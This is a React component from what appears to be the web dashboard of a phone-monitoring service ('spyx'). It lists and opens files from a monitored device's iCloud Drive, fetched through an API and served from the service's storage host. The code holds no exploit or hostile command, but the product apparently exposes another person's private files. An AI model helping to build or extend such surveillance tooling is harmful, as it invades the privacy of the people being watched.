import React, { useRef, useState, useEffect } from 'react'


import { useTranslation } from 'src/utils/i18n'
import Grid from '@mui/material/Grid'
import Image from 'next/image'
import { openInNewTab } from 'src/utils/navigate'

import dayjs from 'dayjs'
import Icon from 'src/@core/components/icon'

import { getDriveDir } from 'src/@api/dashboard'
import { useDispatch } from 'react-redux'
import { setCurrentTab } from 'src/store/apps/Common'
import IosVerfiyProcess from 'src/@core/components/ios-verfiy-process'

let fileBaseUrl = 'https://cos.spyx.com/'

export default function ICloudDrive() {
  let username =
    JSON.parse(localStorage.getItem('DeviceUser')) != null
      ? JSON.parse(localStorage.getItem('DeviceUser')).username
      : ''

  // 类型
  const [showType, setShowType] = useState('card')

  const typeSwitch = () => {
    showType == 'card' ? setShowType('list') : setShowType('card')
  }

  // 上级目录
  const [parent, setParent] = useState({ docwsid: 'root', name: '' })

  // 当前目录
  const [currentFolder, setCurrentFolder] = useState([])
  const [isLoading, setIsLoading] = useState(true) //正在加载获取数据

  // 文件类型
  let fileType = [
    'zip',
    'xlsx',
    'xls',
    'wps',
    'txt',
    'tif',
    'tar',
    'swf',
    'rp',
    'rm',
    'rar',
    'psd',
    'psb',
    'ppt',
    'png',
    'pdf',
    'mp4',
    'mp3',
    'mov',
    'keynote',
    'jpg',
    'jpeg',
    'html',
    'gif',
    'folder',
    'flv',
    'ext',
    'eps',
    'docx',
    'doc',
    'csv',
    'bmp',
    'avi',
    'ai',
    '7z'
  ]

  const getData = async params => {
    let { data } = await getDriveDir(params)
    if (data.contents != null) {
      let result = data.contents.items.filter(item => item.type == 'FOLDER' || item.type == 'FILE')
      setCurrentFolder(result)
      setParent({ docwsid: data.contents.parentId, name: data.contents.name })
    }
    setIsLoading(false)
  }

  // 打开文件或者进入文件夹
  const openFile = row => {
    if (row.type == 'FOLDER') {
      getData({
        username: username,
        params: {
          category: 'ICLOUD_DRIVE_DIR',
          rid: row.docwsid
        }
      })
    } else {
      openInNewTab(`${fileBaseUrl}${row.url}`)
    }
  }

  // 返回上级目录
  const goBack = () => {
    let docwsid = parent.docwsid

    let rid = docwsid.substring(docwsid.lastIndexOf('::') + 2)

    getData({
      username: username,
      params: {
        category: 'ICLOUD_DRIVE_DIR',
        rid: rid
      }
    })
  }

  useEffect(() => {
    getData({
      username: username,
      params: {
        category: 'ICLOUD_DRIVE_DIR',
        rid: 'root'
      }
    })
  }, [])

  const dispatch = useDispatch()

  const { t, locale } = useTranslation('common')
  useEffect(() => {
    const title = t('iCloud drive')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, locale])

  return (
    <div className='bg-[#FFF] drop-shadow-[0_0_12px_rgba(0,0,0,0.13)] rounded-[10px] Bxl:h-[calc(var(--vh2)*100-94px)] Bxls:Headers5:h-[calc(var(--vh2)*100-149px)] Header5:big:h-[calc(var(--vh2)*100-214px)] bigs:h-[calc(var(--vh2)*100-274px)] flex flex-col relative'>
      <div className='w-full h-[68px] border-b border-[#DADADA] text-[18px] text-[#000] font-[600] flex items-center px-[18px]'>
        {parent.name !== '' ? (
          <>
            <Image
              src='/images/icloud-drive/return.svg'
              width={20}
              height={20}
              alt='return'
              className='mr-[8px]'
              onClick={goBack}
            ></Image>
            <span>{parent.name}</span>
          </>
        ) : (
          <>{t('My iPhone')}</>
        )}
      </div>

      <div className='px-[24px] pt-[24px] flex-1 overflow-auto'>
        <Grid>
          <Grid container spacing={0}>
            {currentFolder.map(row => (
              <Grid item xs={12} md={12} lg={12} key={row.docwsid}>
                <div
                  className='border-b border-[#DADADA] py-[12px]'
                  style={{
                    display: 'flex',
                    cursor: 'pointer'
                  }}
                  onClick={() => openFile(row)}
                >
                  <Image
                    src={`/images/files/${row.type == 'FOLDER'
                      ? row.type.toLowerCase()
                      : fileType.includes(row.extension)
                        ? row.extension
                        : 'empty'
                      }.png`}
                    width={54}
                    height={54}
                    alt={'file'}
                  />
                  <div className='ml-[16px] flex-1 flex flex-col justify-center'>
                    <p
                      className='text-[16px] text-[#000] font-[600]'
                      style={{ overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}
                    >
                      {row.name}
                      {row.extension ? `.${row.extension}` : null}
                    </p>
                    <p className='text-[12px] text-[#9B9B9D]'>{dayjs(row.dateCreated).format('M/DD/YYYY,h:mm a')}</p>
                  </div>
                </div>
              </Grid>
            ))}
          </Grid>
        </Grid>
      </div>

      {(!parent.name && currentFolder.length < 1 && !isLoading) &&
        <div className='text-center px-2 absolute inset-0 flex justify-center items-center pointer-events-none'>
          {t('It appears theres no data to show here yet')}<br />
          {t('If data exists it may take up to 1 hour to download and appear')}<br />
          {t('We suggest checking back in a little while')}
        </div>}
    </div>
  )
}


